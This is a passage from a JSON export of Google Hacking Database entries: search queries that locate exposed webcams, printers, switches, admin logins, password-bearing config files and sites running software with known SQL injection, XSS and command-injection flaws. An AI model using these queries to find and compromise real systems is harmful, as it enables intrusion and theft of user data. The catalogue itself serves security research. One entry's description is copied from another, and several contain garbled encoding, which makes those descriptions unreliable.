Code Version, Firmware, Uptime, Hardware Address, IP Address and Subnet Mask). The other setting pages are password protected." }, { "signatureReferenceNumber": "519", "link": "https://www.exploit-db.com/ghdb/519/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22remote+ui%3Atop+page%22", "shortDescription": "Canon ImageReady machines", "textualDescription": "The \"large\" Canon ImageReady machines with model versions 3300, 5000 & 60000." }, { "signatureReferenceNumber": "520", "link": "https://www.exploit-db.com/ghdb/520/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%28%28inurl%3Aifgraph+%22Page+generated+at%22%29+OR+%28%22This+page+was+built+using+ifgraph%22%29%29+&btnG=Search", "shortDescription": "((inurl:ifgraph \"Page generated at\") OR (\"This page was built using ifgraph\"))", "textualDescription": "ifGraph is a set of perl scripts that were created to fetch data from SNMP agents and feed a RRD file (Round Robin Database) so that graphics can be created later. The graphics and the databases are created using a tool called RRDTool." }, { "signatureReferenceNumber": "521", "link": "https://www.exploit-db.com/ghdb/521/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=ext:cgi+intext:%22nrg-%22+%22+This+web+page+was+created+on+%22&hl=en&lr=&ie=UTF-8&filter=1", "shortDescription": "ext:cgi intext:\"nrg-\" \" This web page was created on \"", "textualDescription": "NRG is a system for maintaining and visualizing network data and other resource utilization data. It automates the maintenance of RRDtool databases and graph web pages (that look like MRTG web pages.)" }, { "signatureReferenceNumber": "522", "link": "https://www.exploit-db.com/ghdb/522/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=%2B%22%3A8080%22+%2B%22%3A3128%22+%2B%22%3A80%22+filetype%3Atxt", "shortDescription": "+\":8080\" +\":3128\" +\":80\" filetype:txt", "textualDescription": "With the string [+\":8080\" +\":3128\" +\":80\" filetype:txt] it is possible to find huge lists of proxies... So, I've written a simple shell script that checks these lists and filters out the not responding proxies. It also stores time response in another file, so you can choose only fast proxies. Furthermore it can control the zone of the proxy with a simple whois grep... The script proxytest.sh is on my website:http://rawlab.relay.homelinux.net/programmi/proxytest.sh" }, { "signatureReferenceNumber": "523", "link": "https://www.exploit-db.com/ghdb/523/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl%3Acom_remository", "shortDescription": "ReMOSitory module for Mambo", "textualDescription": "It is reported that the ReMOSitory module for Mambo is prone to an SQL injection vulnerability. This issue is due to a failure of the module to properly validate user supplied URI input. Because of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue.Full report: http://www.securityfocus.com/bid/11219Klouw suggests: inurl:index.php?option=com_remository&Itemid= Renegade added : \".. to get an administrator login, change the url to http://www.example.com/administrator .. it will pop up an login box..." }, { "signatureReferenceNumber": "524", "link": "https://www.exploit-db.com/ghdb/524/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=de&ie=ISO-8859-1&q=inurl%3Acgi.asx%3FStoreID+%0D%0A+%0D%0A&btnG=Google-Suche&meta=", "shortDescription": "inurl:cgi.asx?StoreID", "textualDescription": "BeyondTV is a web based software product which let you manage your TV station. All you need is to install a TV tuner card on your PC and Connect your TV source (i.e. television antenna) to your TV tuner card. With a installed BeyondTV version you can now administrate your TV with your browser even over the internet." }, { "signatureReferenceNumber": "525", "link": "https://www.exploit-db.com/ghdb/525/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=de&ie=ISO-8859-1&q=inurl%3Ahp%2Fdevice%2Fthis.LCDispatcher+&btnG=Suche&lr=&btnG=Google-Suche&meta=", "shortDescription": "inurl:hp/device/this.LCDispatcher", "textualDescription": "This one gets you on the web interface of some more HP Printers." }, { "signatureReferenceNumber": "526", "link": "https://www.exploit-db.com/ghdb/526/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22WordPress+%3E+*+%3E+Login+form%22+inurl%3A%22wp-login.php%22+&btnG=Search", "shortDescription": "intitle:\"WordPress > * > Login form\" inurl:\"wp-login.php\"", "textualDescription": "WordPress is a semantic personal publishing platform.. it suffers from a possible XSS attacks.http://www.securityfocus.com/bid/11268/info/" }, { "signatureReferenceNumber": "527", "link": "https://www.exploit-db.com/ghdb/527/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=intitle%3Awebeye+inurl%3Alogin.ml+&btnG=Search", "shortDescription": "intitle:webeye inurl:login.ml", "textualDescription": "This one gets you on the webinterface of Webeye webcams." }, { "signatureReferenceNumber": "528", "link": "https://www.exploit-db.com/ghdb/528/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=inurl%3A%22comment.php%3Fserendipity%22&btnG=Search", "shortDescription": "inurl:\"comment.php?serendipity\"", "textualDescription": "serendipity is a weblog/blog system, implemented with PHP. It is standards compliant, feature rich and open source.For an attacker it is possible to inject SQL commands.http://www.securityfocus.com/bid/11269/discussion/" }, { "signatureReferenceNumber": "529", "link": "https://www.exploit-db.com/ghdb/529/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%22Powered+by+AJ-Fork+v.167%22+%0D%0A&btnG=Search", "shortDescription": "\"Powered by AJ-Fork v.167\"", "textualDescription": "AJ-Fork is, as the name implies - a fork. Based on the CuteNews 1.3.1 core, the aim of the project is to improve what can be improved, and extend what can be extended without adding too much bloat (in fierce opposition to the mainstream blogging/light publishing tools of today). The project aims to be backwards-compatible with CuteNews in what areas are sensible. It is vulnerable for a full path disclosure. http://www.securityfocus.com/bid/11301" }, { "signatureReferenceNumber": "530", "link": "https://www.exploit-db.com/ghdb/530/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com.ar/search?hl=es&ie=ISO-8859-1&q=%22Powered+by+Megabook+*%22+inurl%3Aguestbook.cgi+%0D%0A&btnG=B%FAsqueda&meta=", "shortDescription": "\"Powered by Megabook *\" inurl:guestbook.cgi", "textualDescription": "MegaBook is a web-based guestbook that is intended to run on Unix and Linux variants. MegaBook is prone to multiple HTML injection vulnerabilities. http://www.securityfocus.com/bid/8065" }, { "signatureReferenceNumber": "531", "link": "https://www.exploit-db.com/ghdb/531/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22axis+storpoint+CD%22+intitle:%22ip+address%22&hl=en&lr=&ie=UTF-8&filter=0", "shortDescription": "intitle:\"axis storpoint CD\" intitle:\"ip address\"", "textualDescription": "Axis' network CD/DVD servers are faster, less costly and easier to manage than using full-blown file servers for networking CD/DVD collections. Any organization that relies heavily on CD/DVD-based information can benefit from an AXIS StorPoint CD+." }, { "signatureReferenceNumber": "532", "link": "https://www.exploit-db.com/ghdb/532/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intext%3ASQLiteManager+inurl%3Amain.php&btnG=Search&hl=en&lr=&ie=UTF-8", "shortDescription": "intext:SQLiteManager inurl:main.php", "textualDescription": "sQLiteManager is a tool Web multi-language of management of data bases SQLite. # Management of several data base (Creation, access or upload basic) # Management of the attached bases of donn\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00a8es # Creation, modification and removal of tables and index. # Insertion, modification, suppression of recording in these tables" }, { "signatureReferenceNumber": "533", "link": "https://www.exploit-db.com/ghdb/533/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22oMail-admin+Administration+-+Login%22++-inurl%3Aomnis.ch&btnG=Search", "shortDescription": "intitle:\"oMail-admin Administration - Login\" -inurl:omnis.ch", "textualDescription": "oMail-webmail is a Webmail solution for mail servers based on qmail and optionally vmailmgr or vpopmail. The mail is read directly from maildirs on the hard disk, which is much quicker than using protocols like POP3 or IMAP. Other features includes multiple language support (English, French, German, Japanese, Chinese, and many more), HTML and pictures inline display, folders, and address book support." }, { "signatureReferenceNumber": "534", "link": "https://www.exploit-db.com/ghdb/534/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=inurl:%22map.asp%3F%22+intitle:%22WhatsUp+Gold%22&hl=en&lr=&ie=UTF-8&filter=0", "shortDescription": "inurl:\"map.asp?\" intitle:\"WhatsUp Gold\"", "textualDescription": "\"WhatsUp Gold's new SNMP Viewer tool enables Area-Wide to easily track variables associated with any port on a network device. With a few simple clicks, a network engineer can select device ports, navigate trees, and graph variables in real time. For instance, Area-Wide can track bandwidth or CPU utilization on a router to aid in capacity and resource management.\"" }, { "signatureReferenceNumber": "535", "link": "https://www.exploit-db.com/ghdb/535/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=inurl:%22+WWWADMIN.PL%22+intitle:%22wwwadmin%22&hl=en&lr=&ie=UTF-8&start=0&sa=N", "shortDescription": "inurl:\" WWWADMIN.PL\" intitle:\"wwwadmin\"", "textualDescription": "wwwadmin.pl is a script that allows a user with a valid username and password, to delete files and posts from the associated forum." }, { "signatureReferenceNumber": "536", "link": "https://www.exploit-db.com/ghdb/536/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&q=inurl%3Aodbc.ini+ext%3Aini+-cvs&btnG=Search", "shortDescription": "inurl:odbc.ini ext:ini -cvs", "textualDescription": "This search will show the googler ODBC client configuration files which may contain usernames/databases/ipaddresses and whatever." }, { "signatureReferenceNumber": "537", "link": "https://www.exploit-db.com/ghdb/537/", "category": "Footholds", "querystring": "http://www.google.com/search?q=intitle:%22Web+Data+Administrator+-+Login%22&hl=en&lr=&ie=UTF-8&filter=0", "shortDescription": "intitle:\"Web Data Administrator - Login\"", "textualDescription": "The Web Data Administrator is a utility program implemented in ASP.NET that enables you to easily manage your SQL Server data wherever you are. Using its built-in features, you can do the following from Internet Explorer or your favorite Web browser. Create and edit databases in Microsoft SQL Server 2000 or Microsoft SQL Server 2000 Desktop Engine (MSDE) Perform ad-hoc queries against databases and save them to your file system Export and import database schema and data." }, { "signatureReferenceNumber": "538", "link": "https://www.exploit-db.com/ghdb/538/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=intitle:%22Object+not+found%22+netware+%22apache+1..%22&hl=en&lr=&filter=0", "shortDescription": "intitle:\"Object not found\" netware \"apache 1..\"", "textualDescription": "This search will show netware apache webservers as the result." }, { "signatureReferenceNumber": "539", "link": "https://www.exploit-db.com/ghdb/539/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=intitle%3A%22switch+home+page%22+%22cisco+systems%22+%22Telnet+-+to%22&btnG=Search", "shortDescription": "intitle:\"switch home page\" \"cisco systems\" \"Telnet - to\"", "textualDescription": "Most cisco switches are shipped with a web administration interface. If a switch is reachable from the internet and google cashed it this search will show it." }, { "signatureReferenceNumber": "540", "link": "https://www.exploit-db.com/ghdb/540/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22DEFAULT_CONFIG+-+HP%22&ie=UTF-8&oe=UTF-8", "shortDescription": "intitle:\"DEFAULT_CONFIG - HP\"", "textualDescription": "searches for the web interface of HP switches." }, { "signatureReferenceNumber": "541", "link": "https://www.exploit-db.com/ghdb/541/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+yappa-ng%22&hl=en&lr=&filter=0", "shortDescription": "\"Powered by yappa-ng\"", "textualDescription": "yappa-ng is a very powerful but easy to install and easy to use online PHP photo gallery for all Operating Systems (Linux/UNIX, Windows, MAC, ...), and all Webservers (Apache, IIS, ...) with no need for a DataBase (no MySQL,...).yappa-ng is prone to a security vulnerability in the AddOn that shows a random image from any homepage. This issue may let unauthorized users access images from locked albums.http://www.securityfocus.com/bid/11314" }, { "signatureReferenceNumber": "542", "link": "https://www.exploit-db.com/ghdb/542/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com.ar/search?hl=es&q=%22Active+Webcam+Page%22++inurl%3A8080&btnG=B%C3%BAsqueda&meta=", "shortDescription": "\"Active Webcam Page\" inurl:8080", "textualDescription": "Active WebCam is a shareware program for capturing and sharing the video streams from a lot of video devices. Known bugs: directory traversal and cross site scripting" }, { "signatureReferenceNumber": "543", "link": "https://www.exploit-db.com/ghdb/543/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=en&lr=&q=inurl%3Achangepassword.cgi+-cvs&btnG=Search", "shortDescription": "inurl:changepassword.cgi -cvs", "textualDescription": "Allows a user to change his/her password for authentication to the system. Script allows for repeated failed attempts making this script vulnerable to brute force." }, { "signatureReferenceNumber": "544", "link": "https://www.exploit-db.com/ghdb/544/", "category": "Files containing passwords", "querystring": "http://www.google.de/search?hl=de&ie=ISO-8859-1&q=filetype%3Aini+inurl%3AflashFXP.ini&btnG=Google-Suche&meta=", "shortDescription": "filetype:ini inurl:flashFXP.ini", "textualDescription": "FlashFXP offers the easiest and fastest way to transfer any file using FTP, providing an exceptionally stable and robust program that you can always count on to get your job done quickly and efficiently. There are many, many features available in FlashFXP.The flashFXP.ini file is its configuration file and may contain usernames/passwords and everything else that is needed to use FTP." }, { "signatureReferenceNumber": "545", "link": "https://www.exploit-db.com/ghdb/545/", "category": "Sensitive Online Shopping Info", "querystring": "http://www.google.de/search?hl=de&ie=ISO-8859-1&q=inurl%3Ashopdbtest.asp&btnG=Suche&meta=", "shortDescription": "inurl:shopdbtest.asp", "textualDescription": "shopdbtest is an ASP page used by several e-commerce products. A vulnerability in the script allows remote attackers toview the database location, and since that is usually unprotected, the attacker can then download the web site's database by simly clicking on a URL (that displays the active database). The page shopdbtest.asp is visible to all the users and contains the full configuration information. An attacker ca therefore download the MDB (Microsoft Database file), and gain access to sensitive information about orders, users, password, ect." }, { "signatureReferenceNumber": "546", "link": "https://www.exploit-db.com/ghdb/546/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=es&q=%22Powered+by+A-CART%22+&meta=", "shortDescription": "\"Powered by A-CART\"", "textualDescription": "A-CART is an ASP shopping cart application written in VBScript. It is comprised of a number of ASP scripts and an Access database. A security vulnerability in the product allows remote attackers to download the product's database, thus gain access to sensitive information about users of the product (name, surname, address, e-mail, credit card number, and user's login-password). http://www.securityfocus.com/bid/5597 (search SF for more)" }, { "signatureReferenceNumber": "547", "link": "https://www.exploit-db.com/ghdb/547/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=es&q=%22Online+Store+-+Powered+by+ProductCart%22+&meta=", "shortDescription": "\"Online Store - Powered by ProductCart\"", "textualDescription": "ProductCart is \"an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools and remarkable ease of use. It is widely used by many e-commerce sites\". Multiple SQL injection vulnerabilities have been found in the product, they allow anything from gaining administrative privileges (bypassing the authentication mechanism), to executing arbitrary code. http://www.securityfocus.com/bid/8105 (search SF for more)" }, { "signatureReferenceNumber": "548", "link": "https://www.exploit-db.com/ghdb/548/", "category": "Sensitive Online Shopping Info", "querystring": "http://www.google.com/search?hl=de&ie=ISO-8859-1&q=%22More+Info+about+MetaCart+Free%22&btnG=Suche&meta=", "shortDescription": "\"More Info about MetaCart Free\"", "textualDescription": "MetaCart is an ASP based shopping Cart application with SQL database. A security vulnerability in the free demo version of the product (MetaCartFree) allows attackers to access the database used for storing user provided data (Credit cart numbers, Names, Surnames, Addresses, E-mails, etc)." }, { "signatureReferenceNumber": "549", "link": "https://www.exploit-db.com/ghdb/549/", "category": "Sensitive Online Shopping Info", "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=inurl%3Amidicart.mdb&btnG=Google-Suche&meta=", "shortDescription": "inurl:midicart.mdb", "textualDescription": "MIDICART is s an ASP and PHP based shopping Cart application with MS Access and SQL database. A security vulnerability in the product allows remote attackers to download the product's database, thus gain access to sensitive information about users of the product (name, surname, address, e-mail, phone number, credit card number, and company name)." }, { "signatureReferenceNumber": "550", "link": "https://www.exploit-db.com/ghdb/550/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=camera+linksys+inurl%3Amain.cgi&start=0&start=0&ie=utf-8&oe=utf-8", "shortDescription": "camera linksys inurl:main.cgi", "textualDescription": "Another webcam, Linksys style." }, { "signatureReferenceNumber": "551", "link": "https://www.exploit-db.com/ghdb/551/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22MailMan+Login%22+++&btnG=Suche&meta=", "shortDescription": "intitle:\"MailMan Login\"", "textualDescription": "MailMan is a product by Endymion corporation that provides a web based interface to email via POP3 and SMTP. MailMan is very popular due to its amazingly easy setup and operation. MailMan is written as a Perl CGI script, the version that is shipped to customers is obfuscated in an attempt to prevent piracy. The code contains several insecure calls to open() containing user specified data. These calls can be used to execute commands on the remote server with the permissions of the user that runs CGI scripts, usually the web server user that is in most cases 'nobody'." }, { "signatureReferenceNumber": "552", "link": "https://www.exploit-db.com/ghdb/552/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&client=firefox-a&q=intitle%3A%22my+webcamXP+server%21%22+inurl%3A%22%3A8080%22&btnG=Search", "shortDescription": "intitle:\"my webcamXP server!\" inurl:\":8080\"", "textualDescription": "\"my webcamXP server!\"Is there really an explantation needed?" }, { "signatureReferenceNumber": "553", "link": "https://www.exploit-db.com/ghdb/553/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=20&q=%28inurl%3AwebArch%2FmainFrame.cgi+%29+%7C+%28intitle%3A%22web+image+monitor%22+-htm+-solutions%29", "shortDescription": "(inurl:webArch/mainFrame.cgi ) | (intitle:\"web image monitor\" -htm -solutions)", "textualDescription": "The Ricoh Aficio 2035 (fax/scanner) web interface.Attackers may read faxes and can get information like internal ip addresses.cleanup by: yeseins & golfocleanup date: Apr 28, 2005original dork: inurl:webArch/mainFrame.cgi" }, { "signatureReferenceNumber": "554", "link": "https://www.exploit-db.com/ghdb/554/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22Powered+by+FUDforum%22+&btnG=B%C3%BAsqueda&meta=", "shortDescription": "\"Powered by FUDforum\"", "textualDescription": "FUDforum is a forums package. It uses a combination of PHP & MySQL to create a portable solution that can run on virtually any operating system. FUDforum has two security holes that allow people to download or manipulate files and directories outside of FUDforum's directories. One of the holes can be exploited by everyone, while the other requires administrator access. The program also has some SQL Injection problems. http://www.securityfocus.com/bid/5501" }, { "signatureReferenceNumber": "555", "link": "https://www.exploit-db.com/ghdb/555/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22BosDates+Calendar+System+%22+%22powered+by+BosDates+v3.2+by+BosDev%22&btnG=B%C3%BAsqueda&meta=", "shortDescription": "\"BosDates Calendar System \" \"powered by BosDates v3.2 by BosDev\"", "textualDescription": "\"BosDates is a flexible calendar system which allows for multiple calendars, email notifications, repeating events and much more. All of which are easily maintained by even the least technical users.\" There is a vulnerability in BosDates that allows an attacker to disclose sensitive information via SQL injection." }, { "signatureReferenceNumber": "556", "link": "https://www.exploit-db.com/ghdb/556/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=intitle:%22Lotus+Domino+Go+Webserver:%22+%22Tuning+your+webserver%22+-site:ibm.com&hl=en&lr=&ie=UTF-8&filter=0", "shortDescription": "intitle:\"Lotus Domino Go Webserver:\" \"Tuning your webserver\" -site:ibm.com", "textualDescription": "Domino Go Webserver is a scalable high-performance Web server that runs on a broad range of platforms. Domino Go Webserver brings you state-of-the-art security, site indexing capabilities, and advanced server statistics reporting. With Domino Go Webserver, you can speed beyond your competition by exploiting the latest advances in technology, such as Java, HTTP 1.1, and Web site content rating. Get all this and more in a Web server that's easy to install and maintain. --From the Lotus Domino Go Webserver web pag" }, { "signatureReferenceNumber": "557", "link": "https://www.exploit-db.com/ghdb/557/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=intitle:%22Directory+Listing,+Index+of+/*/%22&hl=en&lr=&filter=0", "shortDescription": "intitle:\"Directory Listing, Index of /*/\"", "textualDescription": "Vendor page:\"Einfache HTTP-Server-Software f\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00bcr privates Homepage-Hosting oder gro\u00c3\u0192\u00c6\u2019\u00c3\u2026\u00c2\u00b8e Uploads.\"small HTTP server software for private hompage hosting or big uploads." }, { "signatureReferenceNumber": "558", "link": "https://www.exploit-db.com/ghdb/558/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&client=firefox-a&q=intitle%3A%22error+404%22+%22From+RFC+2068+%22&btnG=Search", "shortDescription": "intitle:\"error 404\" \"From RFC 2068 \"", "textualDescription": "WebLogic Server Process Edition extends the functionality of the Application Server by converging custom app development with powerful Business Process Management (BPM) capabilities to provide an industrial strength, standards-based framework that enables the rapidly assembly of composite services, transforming existing infrastructure to a service oriented architecture-in a manageable phased approach." }, { "signatureReferenceNumber": "559", "link": "https://www.exploit-db.com/ghdb/559/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22Open+WebMail%22+%22Open+WebMail+version+%282.20%7C2.21%7C2.30%29+%22&btnG=B%C3%BAsqueda&meta=", "shortDescription": "intitle:\"Open WebMail\" \"Open WebMail version (2.20|2.21|2.30) \"", "textualDescription": "\"Open WebMail is a webmail system based on the Neomail version 1.14 from Ernie Miller. Open WebMail is designed to manage very large mail folder files in a memory efficient way. It also provides a range of features to help users migrate smoothly from Microsoft Outlook to Open WebMail\". A remote attacker can run arbitrary commands with the web server's privileges by exploiting an unfiltered parameter in userstat.pl. Details Vulnerable Systems: * Open Webmail versions 2.20, 2.21 and 2.30 * Limited exploitation on openwebmail-current.tgz that was released on 2004-04-30 (See below) The vulnerability was discovered in an obsolete script named userstat.pl shipped with Open Webmail. The script doesn't properly filter out shell characters from the loginname parameter. The loginname parameter is used as an argument when executing openwebmail-tool.pl from the vulnerable script. By adding a \";\", \"|\" or \"( )\" followed by the shell command to a http GET, HEAD or POST request an attacker can execute arbitrary system commands as an unprivileged user (the Apache user, \"nobody\" or \"www\", e.g.)." }, { "signatureReferenceNumber": "560", "link": "https://www.exploit-db.com/ghdb/560/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=intitle%3A%22EMUMAIL+-+Login%22+%22Powered+by+EMU+Webmail%22+++&btnG=Search", "shortDescription": "intitle:\"EMUMAIL - Login\" \"Powered by EMU Webmail\"", "textualDescription": "The failure to strip script tags in emumail.cgi allows for XSS type of attack. Vulnerable systems: * EMU Webmail version 5.0 * EMU Webmail version 5.1.0 Depending on what functions you throw in there, you get certain contents of the emumail.cgi file. The vulnerability was discovered in an obsolete script named userstat.pl shipped with Open Webmail. The script doesn't properly filter out shell characters from the loginname parameter. http://www.securityfocus.com/bid/9861" }, { "signatureReferenceNumber": "561", "link": "https://www.exploit-db.com/ghdb/561/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&client=firefox-a&q=intitle%3A%22WebJeff+-+FileManager%22+intext%3A%22login%22+intext%3APass%7CPAsse&btnG=Search", "shortDescription": "intitle:\"WebJeff - FileManager\" intext:\"login\" intext:Pass|PAsse", "textualDescription": "WebJeff-Filemanager 1.x DESCRIPTION: A directory traversal vulnerability has been identified in WebJeff-Filemanager allowing malicious people to view the contents of arbitrary files. The problem is that the \"index.php3\" file doesn't verify the path to the requested file. Access to files can be done without authorisation. http://www.securityfocus.com/bid/7995" }, { "signatureReferenceNumber": "562", "link": "https://www.exploit-db.com/ghdb/562/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&q=inurl%3Anetw_tcp.shtml&btnG=B%C3%BAsqueda&meta=", "shortDescription": "inurl:netw_tcp.shtml", "textualDescription": "An Axis Network Camera captures and transmits live images directly over an IP network (e.g. LAN/intranet/Internet), enabling users to remotely view and/or manage the camera from a Web browser on any computer [..]" }, { "signatureReferenceNumber": "563", "link": "https://www.exploit-db.com/ghdb/563/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22Object+not+found%21%22+intext%3A%22Apache%2F2.0.*+%28Linux%2FSuSE%29%22&btnG=B%FAsqueda&meta=", "shortDescription": "intitle:\"Object not found!\" intext:\"Apache/2.0.* (Linux/SuSE)\"", "textualDescription": "This one detects apache werbservers (2.0.X/SuSE) with its error page." }, { "signatureReferenceNumber": "564", "link": "https://www.exploit-db.com/ghdb/564/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&q=inurl%3A%22messageboard%2FForum.asp%3F%22&btnG=Search", "shortDescription": "inurl:\"messageboard/Forum.asp?\"", "textualDescription": "Multiple vulnerabilities have been found in GoSmart Message Board. A remote user can conduct SQL injection attack and Cross site scripting attack. http://www.securityfocus.com/bid/11361" }, { "signatureReferenceNumber": "565", "link": "https://www.exploit-db.com/ghdb/565/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=intitle:%22Directory+Listing%22+%22tree+view%22&hl=en&lr=&ie=UTF-8&client=firefox-a&filter=0", "shortDescription": "intitle:\"Directory Listing\" \"tree view\"", "textualDescription": "Dirlist is an ASP script that list folders in an explorer style: * Tree * Detailed * Tiled Quote: *Lists files and directories in either a Tree, Detailed, or Tiled view. *Can set a \"Starting Directory\". This can be a IIS Virtual Directory path. *Displays file and directory properties. *Can specify directories which you do not want to display and access. *Can specify directories which you only want to display and access. *Can specify what file-types to only display. *Displays custom file-type icons. This can be turned off in the settings. * 'Detailed' and 'tiled' views display a Breadcrumb bar for easier navigation. This can be turned off in the settings." }, { "signatureReferenceNumber": "566", "link": "https://www.exploit-db.com/ghdb/566/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=inurl%3Adefault.asp+intitle%3A%22WebCommander%22+&btnG=Search", "shortDescription": "inurl:default.asp intitle:\"WebCommander\"", "textualDescription": "Polycom WebCommander gives you control over all aspects of setting up conferences on Polycom MGC MCUs. With Polycom WebCommander, scheduling and launching multipoint conferences, ad hoc meetings or future conferences is an easy, productive way to schedule meetings." }, { "signatureReferenceNumber": "567", "link": "https://www.exploit-db.com/ghdb/567/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&client=firefox-a&q=intitle%3A%22Philex+0.2*%22+-script+-site%3Afreelists.org&btnG=Search", "shortDescription": "intitle:\"Philex 0.2*\" -script -site:freelists.org", "textualDescription": "Philex (phile 'file' explorer) is a web content manager based php what philex can do ? - easy navigation with tree structure - create, delete, rename, copy and move folders/files. - download files (normal or compressed :zip, gz, bz ). - download many files as one compressed file. - send files by email. - upload local files to server" }, { "signatureReferenceNumber": "568", "link": "https://www.exploit-db.com/ghdb/568/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=intitle:mywebftp+%22Please+enter+your+password%22&hl=en&lr=&ie=UTF-8&client=firefox-a&filter=0", "shortDescription": "intitle:mywebftp \"Please enter your password\"", "textualDescription": "MyWebFTP Free is a free lite version of MyWebFTP Personal - a PHP script providing FTP client capabilities with the user interface in your browser. Install it on a remote server and easily connect to your FTP servers through a firewall or a proxy not allowing FTP connections. No PHP built-in FTP support is required. Perform actions on many files at once. Password protected from casual surfers wasting your bandwidth. Nice look and feel is easy customizable." }, { "signatureReferenceNumber": "569", "link": "https://www.exploit-db.com/ghdb/569/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&q=%221999-2004+FuseTalk+Inc%22+-site%3Afusetalk.com&btnG=Search", "shortDescription": "\"1999-2004 FuseTalk Inc\" -site:fusetalk.com", "textualDescription": "Fusetalk forums (v4) are susceptible to cross site scripting attacks that can be exploited by passing a img src with malicious javascript." }, { "signatureReferenceNumber": "570", "link": "https://www.exploit-db.com/ghdb/570/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%222003+DUware+All+Rights+Reserved%22&hl=en&lr=&filter=0", "shortDescription": "\"2003 DUware All Rights Reserved\"", "textualDescription": "Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account. DUclassmate may allow unauthorized remote attackers to gain access to a computer. DUclassified is reported prone to multiple SQL injection vulnerabilities. SQL injection issues also affect DUforum. DUclassified and DUforum are also reported vulnerable to various unspecified HTML injection vulnerabilities." }, { "signatureReferenceNumber": "571", "link": "https://www.exploit-db.com/ghdb/571/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&q=%22WebExplorer+Server+-+Login%22+%22Welcome+to+WebExplorer+Server%22&btnG=B%C3%BAsqueda&meta=", "shortDescription": "\"WebExplorer Server - Login\" \"Welcome to WebExplorer Server\"", "textualDescription": "WebExplorer Server is a web-based file management system for sharing files with user permissions and quota limits. It features easy user interface and online administration which will allow you to manage users/groups/permissions without the need of server configuration knowledge. It can be used for remote file storage(eg FreeDrive)/hosting services, Companies/Educational institutions that need to share documents among people." }, { "signatureReferenceNumber": "572", "link": "https://www.exploit-db.com/ghdb/572/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22ASP+Stats+Generator+*.*%22+%22ASP+Stats+Generator%22+%222003-2004+weppos%22&btnG=B%FAsqueda&meta=", "shortDescription": "intitle:\"ASP Stats Generator *.*\" \"ASP Stats Generator\" \"2003-2004 weppos\"", "textualDescription": "ASP Stats Generator is a powerful ASP script to track web site activity. It combines a server side sniffer with a javascript system to get information about clients who are visiting your site." }, { "signatureReferenceNumber": "573", "link": 